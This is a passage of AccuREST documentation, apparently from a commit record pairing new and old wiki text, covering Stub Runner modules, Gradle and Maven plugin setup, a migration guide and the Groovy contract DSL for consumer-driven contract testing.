Modules\n\nAccuREST comes with a new structure of modules\n\n[source,indent=0]\n----\n\u2514\u2500\u2500 stub-runner\n \u251c\u2500\u2500 stub-runner\n \u251c\u2500\u2500 stub-runner-junit\n \u251c\u2500\u2500 stub-runner-spring\n \u2514\u2500\u2500 stub-runner-spring-cloud\n----\n\n#### Stub Runner\n\nContains core logic of Stub Runner. Gives you a main class to run Stub Runner from the command line or from Gradle.\n\nHere you can see a list of options with which you can run Stub Runner:\n\n[source,indent=0]\n----\njava -jar stub-runner.jar [options...]\n -maxp (--maxPort) N : Maximum port value to be assigned to the\n Wiremock instance. Defaults to 15000\n (default: 15000)\n -minp (--minPort) N : Minimal port value to be assigned to the\n Wiremock instance. Defaults to 10000\n (default: 10000)\n -s (--stubs) VAL : Comma separated list of Ivy representation of\n jars with stubs. Eg. groupid:artifactid1,group\n id2:artifactid2:classifier\n -sr (--stubRepositoryRoot) VAL : Location of a Jar containing server where you\n keep your stubs (e.g. http:\/\/nexus.net\/content\n \/repositories\/repository)\n -ss (--stubsSuffix) VAL : Suffix for the jar containing stubs (e.g.\n 'stubs' if the stub jar would have a 'stubs'\n classifier for stubs: foobar-stubs ).\n Defaults to 'stubs' (default: stubs)\n -wo (--workOffline) : Switch to work offline. Defaults to 'false'\n (default: false)\n----\n\nYou can either produce a fat-jar and run the app like presented above.\n\nYou can also configure the stub runner by either passing the full arguments list with the `-Pargs` like this:\n\n`.\/gradlew stub-runner-root:stub-runner:run -Pargs=\"-c pl -minp 10000 -maxp 10005 -s a:b:c,d:e,f:g:h\"`\n\nor each parameter separately with a `-P` prefix and without the hyphen (-) in the name of the param\n\n`.\/gradlew stub-runner-root:stub-runner:run -Pc=pl -Pminp=10000 -Pmaxp=10005 -Ps=a:b:c,d:e,f:g:h`\n\n#### Stub Runner JUnit Rule\n\nStub Runner comes with a JUnit rule thanks to which you can very easily download and run stubs for given group and artifact id:\n\n[source,java,indent=0]\n----\n@ClassRule public static AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot(\"http:\/\/your.repo.com\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\")\n .downloadStub(\"io.codearte:stub1\", \"io.codearte:stub2:classifier\", \"io.codearte:stub3\");\n----\n\nAfter that rule gets executed Stub Runner connects to your Maven repository and for the given list of dependencies tries to:\n* download them\n* cache them locally\n* unzip them to a temporary folder\n* start a WireMock server for each Maven dependency on a random port from the provided range of ports\n* feed the WireMock server with all JSON files that are valid WireMock definitions\n\nStub Runner uses [Groovy's Grape](http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/grape.html) mechanism to download the Maven dependencies. Check their [docs](http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/grape.html) for more information.\n\nSince the `AccurestRule` implements the `StubFinder` it allows you to find the started stubs:\n\n[source,groovy,indent=0]\n----\ninterface StubFinder {\n\t\/**\n\t * For the given groupId and artifactId tries to find the matching\n\t * URL of the running stub.\n\t *\n\t * @param groupId - might be null. In that case a search only via artifactId takes place\n\t * @return URL of a running stub or null if not found\n\t *\/\n\tURL findStubUrl(String groupId, String artifactId)\n\n\t\/**\n\t * For the given Ivy notation {@code groupId:artifactId} tries to find the matching\n\t * URL of the running stub. You can also pass only {@code artifactId}.\n\t *\n\t * @param ivyNotation - Ivy representation of the Maven artifact\n\t * @return URL of a running stub or null if not found\n\t *\/\n\tURL findStubUrl(String ivyNotation)\n\n\t\/**\n\t * Returns all running stubs\n\t *\/\n\tRunningStubs findAllRunningStubs()\n}\n----\n\nExample of usage in Spock tests:\n\n[source,groovy,indent=0]\n----\n@ClassRule @Shared AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot('http:\/\/your.repo.com')\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\")\n\n\tdef 'should start WireMock servers'() {\n\t\texpect: 'WireMocks are running'\n\t\t\trule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null\n\t\t\trule.findStubUrl('loanIssuance') != null\n\t\t\trule.findStubUrl('loanIssuance') == rule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')\n\t\t\trule.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null\n\t\tand:\n\t\t\trule.findAllRunningStubs().isPresent('loanIssuance')\n\t\t\trule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')\n\t\t\trule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')\n\t\tand: 'Stubs were registered'\n\t\t\t\"${rule.findStubUrl('loanIssuance').toString()}\/name\".toURL().text == 'loanIssuance'\n\t\t\t\"${rule.findStubUrl('fraudDetectionServer').toString()}\/name\".toURL().text == 'fraudDetectionServer'\n\t}\n----\n\nExample of usage in JUnit tests:\n\n[source,java,indent=0]\n----\n@ClassRule public static AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot(\"http:\/\/your.repo.com\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\");\n\n\t@Test\n\tpublic void should_start_wiremock_servers() throws Exception {\n\t\t\/\/ expect: 'WireMocks are running'\n\t\t\tthen(rule.findStubUrl(\"io.codearte.accurest.stubs\", \"loanIssuance\")).isNotNull();\n\t\t\tthen(rule.findStubUrl(\"loanIssuance\")).isNotNull();\n\t\t\tthen(rule.findStubUrl(\"loanIssuance\")).isEqualTo(rule.findStubUrl(\"io.codearte.accurest.stubs\", \"loanIssuance\"));\n\t\t\tthen(rule.findStubUrl(\"io.codearte.accurest.stubs:fraudDetectionServer\")).isNotNull();\n\t\t\/\/ and:\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"loanIssuance\")).isTrue();\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"io.codearte.accurest.stubs\", \"fraudDetectionServer\")).isTrue();\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"io.codearte.accurest.stubs:fraudDetectionServer\")).isTrue();\n\t\t\/\/ and: 'Stubs were registered'\n\t\t\tthen(httpGet(rule.findStubUrl(\"loanIssuance\").toString() + \"\/name\")).isEqualTo(\"loanIssuance\");\n\t\t\tthen(httpGet(rule.findStubUrl(\"fraudDetectionServer\").toString() + \"\/name\")).isEqualTo(\"fraudDetectionServer\");\n\t}\n----\n\nCheck the *Common properties for JUnit and Spring* for more information on how to apply global configuration of Stub Runner.\n\n#### Stub Runner Spring\n\nIf you're using Spring then you can just import the `io.codearte.accurest.stubrunner.spring.StubRunnerConfiguration` and a bean of type `StubFinder` will get registered.\n\nIn order to find a URL and port of a given dependency you can autowire the bean in your test and call its methods:\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(classes = Config, loader = SpringApplicationContextLoader)\nclass StubRunnerConfigurationSpec extends Specification {\n\n\t@Autowired StubFinder stubFinder\n\n\tdef 'should start WireMock servers'() {\n\t\texpect: 'WireMocks are running'\n\t\t\tstubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null\n\t\t\tstubFinder.findStubUrl('loanIssuance') != null\n\t\t\tstubFinder.findStubUrl('loanIssuance') == stubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')\n\t\t\tstubFinder.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null\n\t\tand:\n\t\t\tstubFinder.findAllRunningStubs().isPresent('loanIssuance')\n\t\t\tstubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')\n\t\t\tstubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')\n\t\tand: 'Stubs were registered'\n\t\t\t\"${stubFinder.findStubUrl('loanIssuance').toString()}\/name\".toURL().text == 'loanIssuance'\n\t\t\t\"${stubFinder.findStubUrl('fraudDetectionServer').toString()}\/name\".toURL().text == 'fraudDetectionServer'\n\t}\n\n\t@Configuration\n\t@Import(StubRunnerConfiguration)\n\t@EnableAutoConfiguration\n\tstatic class Config {}\n}\n----\n\nCheck the *Common properties for JUnit and Spring* for more information on how to apply global configuration of Stub Runner.\n\n#### Stub Runner Spring Cloud\n\nIf you're using Spring Cloud then it's enough to add `stub-runner-spring-cloud` on classpath and automatically a bean of type `StubFinder` will get registered.\n\n#### Common properties for JUnit and Spring\n\nSome of the properties that are repetitive can be set using system properties or property sources (for Spring). Here are their names with their default values:\n\n[width=\"60%\",frame=\"topbot\",options=\"header\"]\n|======================\n| Property name | Default value | Description |\n|stubrunner.port.range.min|10000| Minimal value of a port for a started WireMock with stubs|\n|stubrunner.port.range.max|15000| Minimal value of a port for a started WireMock with stubs|\n|stubrunner.stubs.repository.root|| Maven repo url. If blank then will call the local maven repo|\n|stubrunner.stubs.classifier|stubs| Default classifier for the stub artifacts|\n|stubrunner.work-offline|false| If true then will not contact any remote repositories to download stubs|\n|stubrunner.stubs|| Comma separated list of Ivy notation of stubs to download|\n|======================\n\n# 9. Migration Guide\n\n# Migration to 0.4.7\n- in 0.4.7 we've fixed package name (coderate to codearte) so you've to do the same in your projects. This means replacing ```io.coderate.accurest.dsl.GroovyDsl``` with ```io.codearte.accurest.dsl.GroovyDsl```\n\n# Migration to 1.0.0-RC1\n- from 1.0.0 we're distinguish ignored contracts from excluded contracts:\n - `excludedFiles` pattern tells Accurest to skip processing those files at all\n - `ignoredFiles` pattern tells Accurest to generate contracts and tests, but tests will be marked as `@Ignore`\n\n- from 1.0.0 the `basePackageForTests` behaviour has changed\n - prior to the change all DSL files had to be under `contractsDslDir`\/`basePackageForTests`\/*subpackage* resulting in `basePackageForTests`.*subpackage* test package creation\n - now all DSL files have to be under `contractsDslDir`\/*subpackage* resulting in `basePackageForTests`.*subpackage* test package creation\n - If you don't migrate to the new approach you will have your tests under `contractsDslDir`.`contractsDslDir`.*subpackage*][][]","old_contents":"http:\/\/:github-tag: master\n:github-repo: Codearte\/accurest\n:github-raw: http:\/\/raw.github.com\/{github-repo}\/{github-tag}\n:github-code: http:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:toc: left\n\nWelcome to the AccuREST Wiki!\n\nPlease follow to the Introduction page to start your journey with Consumer Driven Contracts in JVM\n\n# 1. Introduction\n\nJust to make long story short - AccuREST is a tool that enables Consumer Driven Contract (CDC) development of JVM-based applications. It is shipped with __REST Contract Definition Language__ (DSL). Contract definitions are used by AccuREST to produce following resources:\n* JSON stub definitions to be used by Wiremock when doing integration testing on the client code (__client tests__). Test code must still be written by hand, test data is produced by AccuREST.\n* Acceptance tests (in Spock) used to verify if server-side implementation of the API is compliant with the contract (__server tests__). Full test is generated by AccuREST.\n\nAccuREST moves TDD to the level of software architecture.\n\n# Why?\n\nThe main purposes of AccuREST are:\n\n - to ensure that WireMock stubs (used when developing the client) are doing exactly what actual server-side implementation will do,\n - to promote ATDD method and Microservices architectural style,\n - to provide a way to publish changes in contracts that are immediately visible on both sides,\n - to generate boilerplate test code used on the server side.\n\n# 2. Using in your project\n\n## Prerequisites\n\nIn order to use Accurest with Wiremock you have to have Wiremock in version at least **2.0.0-beta** . Of course the higher the better :)\n\n# 2.1. Gradle Project\n\n## Prerequisites\n\nIn order to use Accurest with Wiremock you have to have Wiremock in version at least **2.0.0-beta** . Of course the higher the better :)\n\n## Add gradle plugin\n\n[source,groovy,indent=0]\n----\nbuildscript {\n\trepositories {\n\t\tmavenCentral()\n\t}\n\tdependencies {\n\t\tclasspath 'io.codearte.accurest:accurest-gradle-plugin:0.9.9'\n\t}\n}\n\napply plugin: 'accurest'\n\ndependencies {\n\ttestCompile 'org.spockframework:spock-core:1.0-groovy-2.4'\n testCompile 'com.github.tomakehurst:wiremock:2.0.4-beta' \/\/ you have to use WireMock with 2.0 versions of JsonPath\n\ttestCompile 'com.jayway.restassured:rest-assured:2.4.1'\n\ttestCompile 'com.jayway.restassured:spring-mock-mvc:2.4.1' \/\/ needed if you're going to use Spring MockMvc\n}\n----\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\n\nRead more: https:\/\/github.com\/Codearte\/accurest-maven-plugin[accurest-maven-plugin]\n\n## Add stubs\n\nBy default Accurest is looking for stubs in src\/test\/resources\/stubs directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\nsrc\/test\/resources\/stubs\/myservice\/shouldCreateUser.groovy\nsrc\/test\/resources\/stubs\/myservice\/shouldReturnUser.groovy\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - shouldCreateUser()\n - shouldReturnUser()\n\n## Run plugin\n\nPlugin registers itself to be invoked before `compileTestGroovy` task. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateAccurest` task.\n\n## Configure plugin\n\nTo change default configuration just add `accurest` snippet to your Gradle config\n\n[source,groovy,indent=0]\n----\naccurest {\n\ttestMode = 'MockMvc'\n\tbaseClassForTests = 'org.mycompany.tests'\n\tgeneratedTestSourcesDir = project.file('src\/accurest')\n}\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default MockMvc which is based on Spring's MockMvc. It can also be changed to **JaxRsClient** or to **Explicit** for real HTTP calls.\n - **imports** - array with imports that should be included in generated tests (for example ['org.myorg.Matchers']). By default empty array []\n - **staticImports** - array with static imports that should be included in generated tests(for example ['org.myorg.Matchers.*']). By default empty array []\n - **basePackageForTests** - specifies base package for all generated tests. By default set to io.codearte.accurest.tests\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **ignoredFiles** - Ant matcher allowing defining stub files for which processing should be skipped. By default empty array []\n - **contractsDslDir** - directory containing contracts written using the GroovyDSL. By default `$rootDir\/src\/test\/accurest`\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. By default `$buildDir\/generated-test-sources\/accurest`\n - **stubsOutputDir** - dir where the generated Wiremock stubs from Groovy DSL should be placed\n - **targetFramework** - the target test framework to be used; currently Spock and JUnit are supported with Spock being the default framework\n\n## Base class for tests\n\n When using Accurest in default MockMvc you need to create a base specification for all generated acceptance tests. In this class you need to point to endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use base class to initialize the whole tested app similarly as in regular integration tests. In case of `JAXRSCLIENT` mode this base class should also contain `protected WebTarget webTarget` field, right now the only option to test JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nTo ensure that provider side is complaint with defined contracts, you need to invoke:\n`.\/gradlew generateAccurest test`\n\n## Accurest on consumer side\n\nIn consumer service you need to configure Accurest plugin in exactly the same way as in case of provider. You need to copy contracts stored in src\/test\/resources\/stubs and generate Wiremock json stubs using: `.\/gradlew generateWireMockClientStubs` command. Note that `stubsOutputDir` option has to be set for stub generation to work.\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath LoanApplication makes a call to FraudDetection service. This request is handled by Wiremock server configured using stubs generated by Accurest.\n\n# 2.2. Using in your Maven project\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nRead more: [accurest-maven-plugin](https:\/\/github.com\/Codearte\/accurest-maven-plugin)\n\n## Add stubs\n\nBy default Accurest is looking for stubs in `src\/test\/accurest` directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\n[source,groovy,indent=0]\n----\nsrc\/test\/accurest\/myservice\/shouldCreateUser.groovy\nsrc\/test\/accurest\/myservice\/shouldReturnUser.groovy\n----\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - `shouldCreateUser()`\n - `shouldReturnUser()`\n\n## Run plugin\n\nPlugin goal `generateTests` is assigned to be invoked in phase `generate-test-sources`. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateTests` goal.\n\n## Configure plugin\n\nTo change default configuration just add `configuration` section to plugin definition or `execution` definition.\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <configuration>\n <basePackageForTests>com.ofg.twitter.place<\/basePackageForTests>\n <baseClassForTests>com.ofg.twitter.place.BaseMockMvcSpec<\/baseClassForTests>\n <\/configuration>\n<\/plugin>\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default `MockMvc` which is based on Spring's MockMvc. It can also be changed to `JaxRsClient` or to `Explicit` for real HTTP calls.\n - **basePackageForTests** - specifies base package for all generated tests. By default set to `io.codearte.accurest.tests`.\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`.\n - **contractsDir** - directory containing contracts written using the GroovyDSL. By default `\/src\/test\/accurest`.\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. By default `target\/generated-test-sources\/accurest`.\n - **mappingsDir** - dir where the generated Wiremock stubs from Groovy DSL should be placed.\n - **testFramework** - the target test framework to be used; currently Spock and JUnit are supported with Spock being the default framework\n\n## Base class for tests\n\n When using Accurest in default MockMvc you need to create a base specification for all generated acceptance tests. In this class you need to point to endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use base class to initialize the whole tested app similarly as in regular integration tests. In case of `JAXRSCLIENT` mode this base class should also contain `protected WebTarget webTarget` field, right now the only option to test JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nAccurest Maven Plugins generates verification code into directory `\/generated-test-sources\/accurest` and attach this directory to `testCompile` goal.\n\nFor Groovy Spock code use:\n\n[source,xml,indent=0]\n----\n<plugin>\n\t<groupId>org.codehaus.gmavenplus<\/groupId>\n\t<artifactId>gmavenplus-plugin<\/artifactId>\n\t<version>1.5<\/version>\n\t<executions>\n\t\t<execution>\n\t\t\t<goals>\n\t\t\t\t<goal>testCompile<\/goal>\n\t\t\t<\/goals>\n\t\t<\/execution>\n\t<\/executions>\n\t<configuration>\n\t\t<testSources>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.basedir}\/src\/test\/groovy<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.build.directory}\/generated-test-sources\/accurest<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t<\/testSources>\n\t<\/configuration>\n<\/plugin>\n----\n\nTo ensure that provider side is complaint with defined contracts, you need to invoke `mvn generateTest test`\n\n## Accurest on consumer side\n\nIn consumer service you need to configure Accurest plugin in exactly the same way as in case of provider. You need to copy contracts stored in `src\/test\/accurest` and generate Wiremock json stubs using: `mvn generateStubs` command. By default generated WireMock mapping is stored in directory `target\/mappings`. Your project should create from this generated mappings additional artifact with classifier `stubs` for easy deploy to maven repository.\n\nSample configuration:\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <version>${accurest.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath LoanApplication makes a call to FraudDetection service. This request is handled by Wiremock server configured using stubs generated by Accurest.\n\n# 3. Contract DSL\n\nContract DSL in AccuREST is written in Groovy, but don't be alarmed if you didn't use Groovy before. Knowledge of the language is not really needed as our DSL uses only a tiny subset of it (namely literals, method calls and closures). What's more, AccuREST's DSL is designed to be programmer-readable without any knowledge of the DSL itself.\n\nLet's look at full example of a contract definition.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'POST'\n urlPath('\/users') {\n queryParameters {\n parameter 'limit': 100\n parameter 'offset': containing(\"1\")\n parameter 'filter': \"email\"\n }\n }\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n response {\n status 200\n headers {\n header 'Location': '\/users\/john'\n }\n }\n}\n----\n\nNot all features of the DSL are used in example above. If you didn't find what you are looking for, please check next paragraphs on this page.\n\n> You can easily compile Accurest Contracts to WireMock stubs mapping using standalone maven command: `mvn io.codearte.accurest:accurest-maven-plugin:convert`.\n\n## Top-Level Elements\n\nFollowing methods can be called in the top-level closure of a contract definition. Request and response are mandatory, priority is optional.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n \/\/ Definition of HTTP request part of the contract\n \/\/ (this can be a valid request or invalid depending\n \/\/ on type of contract being specified).\n request {\n ...\n }\n\n \/\/ Definition of HTTP response part of the contract\n \/\/ (a service implementing this contract should respond\n \/\/ with following response after receiving request\n \/\/ specified in \"request\" part above).\n response {\n ...\n }\n\n \/\/ Contract priority, which can be used for overriding\n \/\/ contracts (1 is highest). Priority is optional.\n priority 1\n}\n----\n\n## Request\n\nHTTP protocol requires only **method and address** to be specified in a request. The same information is mandatory in request definition of AccuREST contract.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n \/\/ HTTP request method (GET\/POST\/PUT\/DELETE).\n method 'GET'\n\n \/\/ Path component of request URL is specified as follows.\n urlPath('\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nIt is possible to specify whole `url` instead of just path, but `urlPath` is the recommended way as it makes the tests **host-independent**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'GET'\n\n \/\/ Specifying `url` and `urlPath` in one contract is illegal.\n url('http:\/\/localhost:8888\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nRequest may contain **query parameters**, which are specified in a closure nested in a call to `urlPath` or `url`.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n urlPath('\/users') {\n\n \/\/ Each parameter is specified in form\n \/\/ `'paramName' : paramValue` where parameter value\n \/\/ may be a simple literal or one of matcher functions,\n \/\/ all of which are used in this example.\n queryParameters {\n\n \/\/ If a simple literal is used as value\n \/\/ default matcher function is used (equalTo)\n parameter 'limit': 100\n\n \/\/ `equalTo` function simply compares passed value\n \/\/ using identity operator (==).\n parameter 'filter': equalTo(\"email\")\n\n \/\/ `containing` function matches strings\n \/\/ that contains passed substring.\n parameter 'gender': containing(\"[mf]\")\n\n \/\/ `matching` function tests parameter\n \/\/ against passed regular expression.\n parameter 'offset': matching(\"[0-9]+\")\n\n \/\/ `notMatching` functions tests if parameter\n \/\/ does not match passed regular expression.\n parameter 'loginStartsWith': notMatching(\".{0,2}\")\n }\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\nIt may contain additional **request headers**...\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ Each header is added in form `'Header-Name' : 'Header-Value'`.\n headers {\n header 'Content-Type': 'application\/json'\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\n...and a **request body**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ JSON and XML formats of request body are supported.\n \/\/ Format will be determined from a header or body's content.\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n\n response {\n ...\n }\n}\n----\n\n**Body's format** can also be specified explicitly by invoking one of format functions.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ In this case body will be formatted as XML.\n body equalToXml(\n '''<user><login>john<\/login><name>John The Contract<\/name><\/user>'''\n )\n }\n\n response {\n ...\n }\n}\n----\n\n## Response\n\nMinimal response must contain **HTTP status code**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n }\n response {\n \/\/ Status code sent by the server\n \/\/ in response to request specified above.\n status 200\n }\n}\n----\n\nBesides status response may contain **headers** and **body**, which are specified the same way as in the request (see previous paragraph).\n\n## Regular expressions\nYou can use regular expressions to write your requests in Contract DSL. It is particularly useful when you want to indicate that a given response should be provided for requests that follow a given pattern. Also, you can use it when you need to use patterns and not exact values both for your test and your server side tests.\n\n Please see the example below:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl groovyDsl = GroovyDsl.make {\n request {\n method('GET')\n url $(client(~\/\\\/[0-9]{2}\/), server('\/12'))\n }\n response {\n status 200\n body(\n id: value(\n client('123'),\n server(regex('[0-9]+'))\n ),\n surname: $(\n client('Kowalsky'),\n server('Lewandowski')\n ),\n name: 'Jan',\n created: $(client('2014-02-02 12:23:43'), server({ currentDate(it) }))\n correlationId: value(client('5d1f9fef-e0dc-4f3d-a7e4-72d2220dd827'),\n server(regex('[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}')\n )\n )\n headers {\n header 'Content-Type': 'text\/plain'\n }\n }\n}\n----\n\n## Passing optional parameters\n\nIt is possible to provide optional parameters in your contract. It's only possible to have optional parameter for the:\n\n- __STUB__ side of the Request\n- __TEST__ side of the Response\n\nExample:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n priority 1\n request {\n method 'POST'\n url '\/users\/password'\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n email: $(stub(optional(regex(email()))), test('abc@abc.com')),\n callback_url: $(stub(regex(hostname())), test('http:\/\/partners.com'))\n )\n }\n response {\n status 404\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n code: value(stub(\"123123\"), test(optional(\"123123\"))),\n message: \"User not found by email = [${value(test(regex(email())), stub('not.existing@user.com'))}]\"\n )\n }\n}\n----\n\nBy wrapping a part of the body with the `optional()` method you are in fact creating a regular expression that should be present 0 or more times.\n\nThat way for the example above the following test would be generated:\n\n[source,groovy,indent=0]\n----\n given:\n def request = given()\n .header('Content-Type', 'application\/json')\n .body('{\"email\":\"abc@abc.com\",\"callback_url\":\"http:\/\/partners.com\"}')\n\n when:\n def response = given().spec(request)\n .post(\"\/users\/password\")\n\n then:\n response.statusCode == 404\n response.header('Content-Type') == 'application\/json'\n and:\n DocumentContext parsedJson = JsonPath.parse(response.body.asString())\n !parsedJson.read('''$[?(@.code =~ \/(123123)?\/)]''', JSONArray).empty\n !parsedJson.read('''$[?(@.message =~ \/User not found by email = \\\\[[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4}\\\\]\/)]''', 